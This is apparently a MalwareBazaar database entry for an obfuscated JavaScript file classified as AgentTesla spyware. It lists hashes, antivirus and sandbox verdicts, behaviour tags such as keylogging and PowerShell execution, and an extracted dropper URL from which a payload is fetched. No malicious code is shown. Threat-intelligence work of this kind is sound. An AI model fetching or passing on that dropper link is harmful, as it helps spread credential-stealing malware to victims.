MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AgentTesla

Vendor detections: 11

Intelligence 11 IOCs YARA File information Comments

SHA256 hash:	5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c
SHA3-384 hash:	745c734843600c8b2e8b7adc92e8d3878fabdd31c24b14ebdc05df808e56dd1d06b41e457e398031652b8f6e93fdcdba
SHA1 hash:	338ce8d9974422d93bc5f99388cf69f7ff486d19
MD5 hash:	a4b72990aed4489533cca2b488886417
humanhash:	lemon-rugby-oxygen-nuts
File name:	5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c.js
Download:	download sample
Signature	AgentTesla Create hunting rule
File size:	5'208'673 bytes
First seen:	2025-09-10 12:55:58 UTC
Last seen:	Never
File type:	js
MIME type:	text/plain
ssdeep	12288:caGW9ZEqk/gyQ8IJBhG/T/YceMlb+TpGyiFlF94NxU+6uR:caVzOAbhG/b3lb+TpGFlF94NxU+zR
Threatray	3'908 similar samples on MalwareBazaar
TLSH	T17A369140FE0666C4CB175D7E3E207FAD1CE5E2BB63E7B71C36216CD2AA24844A1E2D15
Magika	javascript
Reporter	JAMESWT_WT
Tags:	AgentTesla info-abdh-gmbh-de js LOSTINSPACE

Intelligence

File Origin

# of uploads :

1

# of downloads :

128

Origin country :

IT

Vendor Threat Intelligence

Detection(s):

Sanesecurity.Malware.31320.UNOFFICIAL

SecuriteInfo.com.PUA.JS.Obfus-2179.UNOFFICIAL

SecuriteInfo.com.PUA.JS.Obfus-2525.UNOFFICIAL

Verdict:

Malicious

Score:

94.9%

Link:

https://cyber-fortress.com/docs/result/index.php?id=68c175876e66ba602d79d8ac

Tags:

obfuscate xtreme spawn lien

Verdict:

Malicious

Threat level:

10/10

Confidence:

100%

Tags:

anti-vm base64 obfuscated overlay powershell

Link:

https://www.filescan.io/uploads/68c1759a732879482925815d/reports/198193ab-2f74-42ef-97cd-8d4fbf34f906/overview

Verdict:

Malicious

Link:

https://www.hybrid-analysis.com/sample/5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c

Verdict:

Malicious

File Type:

js

First seen:

2025-09-10T04:56:00Z UTC

Last seen:

2025-09-10T04:56:00Z UTC

Hits:

~1000

Detections:

PDM:Trojan.Win32.Generic Trojan.JS.SAgent.sb HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.Generic

Link:

https://opentip.kaspersky.com/5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c/results?tab=lookup

Gathering data

Detection:

agenttesla

Link:

https://mwdb.cert.pl/sample/5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c/

Verdict:

Malicious

Threat:

Family.AGENTTESLA

Link:

https://tip.neiki.dev/file/5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c

Threat name:

Win32.Trojan.Generic

Status:

Suspicious

First seen:

2025-09-10 07:56:46 UTC

File Type:

Binary

AV detection:

5 of 38 (13.16%)

Threat level:

5/5

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=lpd2mvakywme4e5mek4apjdsjgdlwf47tphydsvzq7h2xdqvlu6a._file

Verdict:

malicious

Label(s):

agenttesla

Similar samples:

10364e0c6aee6b43975fd53d6289dd7e6e0f7891d4a5636cb938f68e00717d85

4a974b7fb576b2183acefabf17ef453bd4503e5d25e8e5853d56b9c8a9a8c3ff

6ea4db068135afc1c4b04d0942b9352405623cb8bf2a6d9a5fc3c4c04bb0cc28

fd9dbcc0a59475ba77d799f67faeefe4264cbdec6b1a45180bd6104568a5ac52

+ 3'898 additional samples on MalwareBazaar

Result

Malware family:

agenttesla

Score:

10/10

Tags:

family:agenttesla discovery execution keylogger spyware stealer trojan

Link:

https://tria.ge/reports/250910-p6vcnayqx7/

Behaviour

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SetThreadContext

Looks up external IP address via web service

Checks computer location settings

Badlisted process makes network request

Command and Scripting Interpreter: PowerShell

AgentTesla

Agenttesla family

Malware Config

Dropper Extraction:

https://heuang.unaux.com/docx/file2.jpg

Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

No further information available

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample